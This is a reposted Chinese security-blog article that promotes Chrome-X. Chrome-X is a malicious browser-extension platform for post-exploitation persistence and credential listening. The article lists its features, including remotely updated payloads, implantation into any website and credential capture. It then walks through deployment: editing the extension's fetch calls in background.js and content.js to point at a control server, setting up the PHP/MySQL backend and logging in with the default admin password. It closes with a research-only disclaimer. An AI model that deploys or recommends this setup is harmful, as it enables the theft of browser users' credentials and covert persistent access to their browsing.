Chrome-X 后渗透持久化与凭据监听 🚀
项目介绍 📝
Chrome-X 是一个用于后渗透持久化与票据监听的平台。
功能特点 ✨
👥 每个插件用户可设置唯一值,以防接口暴漏被爆破
📊 后台可远程更新payload
⚙️ 实现持久化与凭据监听
🔒 自定义payload可实现不同场景需求
📱 可实现植入任何网站
系统要求 🛠️
PHP 7.4 或更高版本
MySQL 5.7 或更高版本
插件端配置 📦
background.js文件修改
修改3和4行为用户的用户名和盐
const USERNAME = 'test';const SALT = '666';
第19行 修改API
const response = await fetch(`https://127.0.0.1/api/getuser.php?hash=${hash}`content.js文件修改
修改第64行API
const response = await fetch(`https://127.0.0.1/api/getuser.php?hash=${hash}`, {控制端部署 📦
建议部署在宝塔 给所有文件权限 否则生成sessions会报错
配置数据库文件 /config/config.php
记得配置https 这是非常重要的 不然会导致https的站点无法生效
// MySQL数据库配置define('DB_HOST', 'localhost');define('DB_NAME', 'chrome_x');define('DB_USER', 'chrome_x');define('DB_PASS', 'chrome_x');define('DB_CHARSET', 'utf8mb4');
1. 使用指南 🔑
访问 http://your-domain/
默认管理员账号:admin 密码:admin_hack 【修改密码请到数据库和create_admin.php 第九行 手动修改 或者下个版本修复问题】
首页添加用户 用户名和盐必须和插件的一致
设置payload 其他玩法自行发掘 如:XSS平台等
用户过多分辨不清 可添加备注
测试持久化劫持与凭据获取
Github:
https://github.com/0xShe/Chrome-X
原文始发于微信公众号(知攻善防实验室):远程操控Payload!Chrome-X:打造可动态更新的浏览器端持久化监听平台!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论